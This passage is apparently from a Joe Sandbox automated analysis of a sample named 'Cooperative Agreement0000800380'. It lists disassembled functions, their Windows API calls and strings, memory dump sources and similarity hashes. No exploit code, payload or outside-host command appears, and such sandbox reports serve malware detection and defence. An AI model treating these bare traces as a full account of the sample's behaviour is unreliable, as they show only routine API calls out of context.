CoTaskMemFree.OLE32(?,00000000,00000000,?,02399740,00000000,00000000), ref: 0040A8BA
FreeLibrary.KERNEL32(00000000,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,004046B8,00000000), ref: 0040A8C1
wcscat.MSVCRT ref: 0040A8D9
wcslen.MSVCRT ref: 0040A8DF

Strings

SHGetKnownFolderPath, xrefs: 0040A86F
Shell32.DLL, xrefs: 0040A85E
Downloads\, xrefs: 0040A8D3

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
API String ID: 1740785346-287042676
Opcode ID: ace73f6e0916171b361586c2bbf184c955ba55397e49a90223a244ca9597bb20
Instruction ID: ae609db33c227b916d8c96984f24cc4820d8d1ee700964f601e6ad2a5a3ba7d8
Opcode Fuzzy Hash: ace73f6e0916171b361586c2bbf184c955ba55397e49a90223a244ca9597bb20
Instruction Fuzzy Hash: C821F871344701B6D2303B62EC4EF6F2A78DB91B90F11483BF901B51D2D6BC8A6199AF

Function 00412082 Relevance: 19.6, APIs: 13, Instructions: 74memoryregistrythreadCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 00412092
InitializeCriticalSection.KERNEL32(00418688,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 0041209E
TlsGetValue.KERNEL32(?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 004120B4
HeapAlloc.KERNEL32(00000008,00000014,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 004120CE
EnterCriticalSection.KERNEL32(00418688,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 004120DF
LeaveCriticalSection.KERNEL32(00418688,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 004120FB
GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000), ref: 00412114
GetCurrentThread.KERNEL32 ref: 00412117
GetCurrentProcess.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 0041211E
DuplicateHandle.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412121
RegisterWaitForSingleObject.KERNEL32(0000000C,00000000,0041217A,00000000,000000FF,00000008), ref: 00412137
TlsSetValue.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412144
HeapAlloc.KERNEL32(00000000,0000000C,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412155

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
String ID:
API String ID: 298514914-0
Opcode ID: 090f9e8ec264e5d12bc44ccd603b7065f48900f7029304d299a0ea3cd3686378
Instruction ID: d80fd07e77255670f12a4e616af7295cf706cbaed93ad9a0fedfb01b657d880b
Opcode Fuzzy Hash: 090f9e8ec264e5d12bc44ccd603b7065f48900f7029304d299a0ea3cd3686378
Instruction Fuzzy Hash: 35211971644305FFDB119F64ED88B963FBAFB49311F04C43AFA09962A1CBB49850DB68

Function 00403275 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403302
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040330B
GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 0040342B
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00403434

Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02390000,00000000,?,?), ref: 0040DF1C

PathAddBackslashW.SHLWAPI(00000000,00000000,sysnative,00000000,00000000,00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040333B

Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB

Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02390000,00000000,?), ref: 0040DEF9

GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403468
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403471

Strings

sysnative, xrefs: 00403322, 00403327

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
String ID: sysnative
API String ID: 3406704365-821172135
Opcode ID: 3c1d31c8affcdc6d165275096a5574497656667687e3c5a1ea8ed31f7b3a2118
Instruction ID: 2364f58bb10a159e0aa11294c57d56a9f179ba7a21fd77f55822fae8b4f54734
Opcode Fuzzy Hash: 3c1d31c8affcdc6d165275096a5574497656667687e3c5a1ea8ed31f7b3a2118
Instruction Fuzzy Hash: F5514075518701AAD600BBB2CC82B2F76A9AFD0709F10CC3FF544790D2CA7CD8599A6E

Function 0040DA43 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Kernel32.dll,00000000,00000000,00000000,00000004,00000000,0040D855,0041861C,0040D9E2,00000000,FFFFFFED,00000200,76ED5E70,00409E76,FFFFFFED,00000010), ref: 0040DA51
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040DA66
FreeLibrary.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DA81
InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 0040DA90
Sleep.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DAA2
InterlockedExchange.KERNEL32(00000000,00000002), ref: 0040DAB5

Strings

InitOnceExecuteOnce, xrefs: 0040DA60
Kernel32.dll, xrefs: 0040DA4A

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
String ID: InitOnceExecuteOnce$Kernel32.dll
API String ID: 2918862794-1339284965
Opcode ID: 04ec49063c38c3d68cea197a5330db743d42037b633bf3bb84411c831da1e2b1
Instruction ID: e7d3430369b103de8e34323ddaa6381870798cc52ac97d2691a1b23ef8b22f52
Opcode Fuzzy Hash: 04ec49063c38c3d68cea197a5330db743d42037b633bf3bb84411c831da1e2b1
Instruction Fuzzy Hash: A701B132748204BAD7116FE49C49FEB3B29EF42762F10813AF905A11C0DB7C49458A6D

Function 00409507 Relevance: 12.0, APIs: 8, Instructions: 50threadwindowCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?,00000000), ref: 00409511
GetCurrentThreadId.KERNEL32 ref: 0040951F
IsWindowVisible.USER32(?), ref: 00409526

Part of subcall function 0040DB72: HeapAlloc.KERNEL32(00000008,00000000,0040D3EC,00418610,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB7E

GetCurrentThreadId.KERNEL32 ref: 00409543
GetWindowLongW.USER32(?,000000EC), ref: 00409550
GetForegroundWindow.USER32 ref: 0040955E
IsWindowEnabled.USER32(?), ref: 00409569
EnableWindow.USER32(?,00000000), ref: 00409579

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
String ID:
API String ID: 3383493704-0
Opcode ID: 761db0cbe0c8efe4181c57131f09a45cb1cea28f7de62a6f083fb5992236dbff
Instruction ID: 9be2ebae674c1fa36b8fc713cd4e728ef3198b0ad07c7790c0b3041e5f2a4f9d
Opcode Fuzzy Hash: 761db0cbe0c8efe4181c57131f09a45cb1cea28f7de62a6f083fb5992236dbff
Instruction Fuzzy Hash: A901B9315083016FD3215B769C88AABBAB8AF55750B04C03EF456D3191D7749C40C66D

Function 00408EB4 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 00408EED
GetWindowLongW.USER32(?,000000EB), ref: 00408EFC
GetWindowTextLengthW.USER32 ref: 00408F0A
HeapAlloc.KERNEL32(00000000), ref: 00408F1F
GetWindowTextW.USER32(00000000,00000001), ref: 00408F2F
DestroyWindow.USER32(?), ref: 00408F3D
UnregisterClassW.USER32 ref: 00408F53

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: Window$DestroyText$AllocClassHeapLengthLongUnregister
String ID:
API String ID: 2895088630-0
Opcode ID: cc61bfd3fa705e2cc6efe011ffba927a9334bb0a4f310b6a0f05db5f7333bb42
Instruction ID: dcdd979020c5d84d31bdac08dec077088d7257a56d77306a58cab45369b049af
Opcode Fuzzy Hash: cc61bfd3fa705e2cc6efe011ffba927a9334bb0a4f310b6a0f05db5f7333bb42
Instruction Fuzzy Hash: C611183110810ABFCB116F64ED4C9E63F76EB08361B00C53AF44592AB0CF359955EB58

Function 00409588 Relevance: 9.1, APIs: 6, Instructions: 68threadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(00409507,?), ref: 0040959B
GetCurrentThreadId.KERNEL32 ref: 004095B3
SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 004095CF
GetCurrentThreadId.KERNEL32 ref: 004095EF
EnableWindow.USER32(?,00000001), ref: 00409605
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 0040961C

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: Window$CurrentThread$EnableEnumWindows
String ID:
API String ID: 2527101397-0
Opcode ID: f28d4ca554cd3ae9a733ad6cb4d62ecbd868711740a6e1fed135e0e6fc6d1c23
Instruction ID: f5a6386b144a933a28a8080deaf79be6790ca9cb7a06763c23f847dded1acd22
Opcode Fuzzy Hash: f28d4ca554cd3ae9a733ad6cb4d62ecbd868711740a6e1fed135e0e6fc6d1c23
Instruction Fuzzy Hash: 3E11AF32548741BBD7324B16EC48F577BB9EB81B20F14CA3EF052226E1DB766D44CA18

Function 0040D353 Relevance: 9.1, APIs: 6, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D378
HeapAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D38C
TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D399
TlsGetValue.KERNEL32(00000010,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3B0
HeapReAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3BF
TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3CE

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: AllocValue$Heap
String ID:
API String ID: 2472784365-0
Opcode ID: d4aa023bea7065d4958094be2e1b0a1f42a8661c5ef268aa00a39480e26025ae
Instruction ID: 1e11015e4a25d7f5304c1c18fd55a95fd758b035f13ce6db6bcec7fc4f8c26ab
Opcode Fuzzy Hash: d4aa023bea7065d4958094be2e1b0a1f42a8661c5ef268aa00a39480e26025ae
Instruction Fuzzy Hash: 22116372A45310AFD7109FA5EC84A967BA9FB58760B05803EF904D33B2DB359C048AAC

Function 00412004 Relevance: 9.0, APIs: 6, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

UnregisterWait.KERNEL32(?), ref: 0041200E
CloseHandle.KERNEL32(?,?,?,?,0041218A,?), ref: 00412017
EnterCriticalSection.KERNEL32(00418688,?,?,?,0041218A,?), ref: 00412023
LeaveCriticalSection.KERNEL32(00418688,?,?,?,0041218A,?), ref: 00412048
HeapFree.KERNEL32(00000000,00000000,?,?,?,0041218A,?), ref: 00412066
HeapFree.KERNEL32(?,?,?,?,?,0041218A,?), ref: 00412078

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
String ID:
API String ID: 4204870694-0
Opcode ID: 74c8b0c47b40b3dfa83cc76d0e2e37435eae102b1f5068a19a02dca3843f56c7
Instruction ID: 90751bbfb1e58074f86cd24fa3ef9024ec02ad1f71581e15228f0d3cd8da5416
Opcode Fuzzy Hash: 74c8b0c47b40b3dfa83cc76d0e2e37435eae102b1f5068a19a02dca3843f56c7
Instruction Fuzzy Hash: F5012970201601EFC7249F11EE88A96BF75FF493557108539E61AC2A70C731A821DBA8

Function 004057F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118COMMON

Download Yara Rule

APIs

wcsncmp.MSVCRT ref: 00405853
memmove.MSVCRT(00000000,00000000,?,00000000,00000000,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00417024), ref: 004058E1
wcsncpy.MSVCRT ref: 004058F9

Strings

$0A, xrefs: 0040580C
$0A, xrefs: 00405819

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: memmovewcsncmpwcsncpy
String ID: $0A$$0A
API String ID: 1452150355-167650565
Opcode ID: d76f75147769cfeda3015acce6fec10c4d54059df292c5d7079ca0585360228a
Instruction ID: fc6078814c183f32d07ee1b1bbfb59dc2b99a9263d9aed9d6ca5449e395b5937
Opcode Fuzzy Hash: d76f75147769cfeda3015acce6fec10c4d54059df292c5d7079ca0585360228a
Instruction Fuzzy Hash: 4C31D536904B058BC720FF55888057B77A8EE84344F14893EEC85373C2EB799D61DBAA

Function 00405553 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00405562
GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 00405571
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00405581

Strings

ntdll.dll, xrefs: 0040556C
RtlGetVersion, xrefs: 0040557B

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: RtlGetVersion$ntdll.dll
API String ID: 3137504439-1489217083
Opcode ID: 6332086022332b991d2c4cf9c539ad8fbd8ac088d8322b57d3057784f2e87649
Instruction ID: 30d66d9a54b09ec8b40df40bafdfba1d8cbaec4fc0a5d0b23e6a41b72964e000
Opcode Fuzzy Hash: 6332086022332b991d2c4cf9c539ad8fbd8ac088d8322b57d3057784f2e87649
Instruction Fuzzy Hash: FAE09A3176461176C6202B76AC09FCB2AACDF8AB01B14043AB105E21C5E63C8A018ABD

Function 0040A043 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0040A0AB
HeapAlloc.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?,?,00403C62), ref: 0040A0C1
wcscpy.MSVCRT ref: 0040A0CC
memset.MSVCRT ref: 0040A0FA

Strings

$0A, xrefs: 0040A07C

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: AllocHeapmemsetwcscpywcslen
String ID: $0A
API String ID: 1807340688-513306843
Opcode ID: ddb17ac4584ae50943752de31405e04708b8483d2d19b8b99954ed05a6fee5b2
Instruction ID: f5e08f91bfd61cb5ee80f18050d08b7446549b79f9f251a776f81db7a0f8ced7
Opcode Fuzzy Hash: ddb17ac4584ae50943752de31405e04708b8483d2d19b8b99954ed05a6fee5b2
Instruction Fuzzy Hash: ED212431100B04AFC321AF259845B2BB7F9EF88314F14453FFA8562692DB39A8158B1A

Function 00409DE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409EFA
Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F06
Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409F1A
Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,00000000,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F30

HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DFF
HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E25
HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E82
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E9C

Strings

$0A, xrefs: 00409E87

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: Heap$Free$Alloc
String ID: $0A
API String ID: 3901518246-513306843
Opcode ID: b46946705b204f9c30dffdadfffedc2aca485d526b87e64f112108196cd3b2d8
Instruction ID: e0ba865afb0c504cde721ebe6402ca52a8b9bc1920db32d4218675ac1f34fbd8
Opcode Fuzzy Hash: b46946705b204f9c30dffdadfffedc2aca485d526b87e64f112108196cd3b2d8
Instruction Fuzzy Hash: EC213971600616ABD320DF2ADC01B46BBE9BF88710F41852AB548A76A1DB71EC248BD8

Function 00405492 Relevance: 7.6, APIs: 5, Instructions: 60synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00001000,?,?,00000000,02399740), ref: 004054AB
EnterCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0

Part of subcall function 0040DB32: HeapFree.KERNEL32(00000000,-00000008,0040D44B,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB6B

LeaveCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
String ID:
API String ID: 3708593966-0
Opcode ID: 90d5c19b946ffb749f21a3af15512962dae866b54bf80da6b69c9a1821aaad17
Instruction ID: 0c8983fff82f944e714e95dc609c427016460782395ad7ea9b381996daa8850a
Opcode Fuzzy Hash: 90d5c19b946ffb749f21a3af15512962dae866b54bf80da6b69c9a1821aaad17
Instruction Fuzzy Hash: 6E110632145604BFC3015F54EC05ED7BBB9EF45752721846BF800972A0EB75A8508F6D

Function 0040D946 Relevance: 7.6, APIs: 5, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00418624,00000200,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D95A
LeaveCriticalSection.KERNEL32(00418624,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D9AF

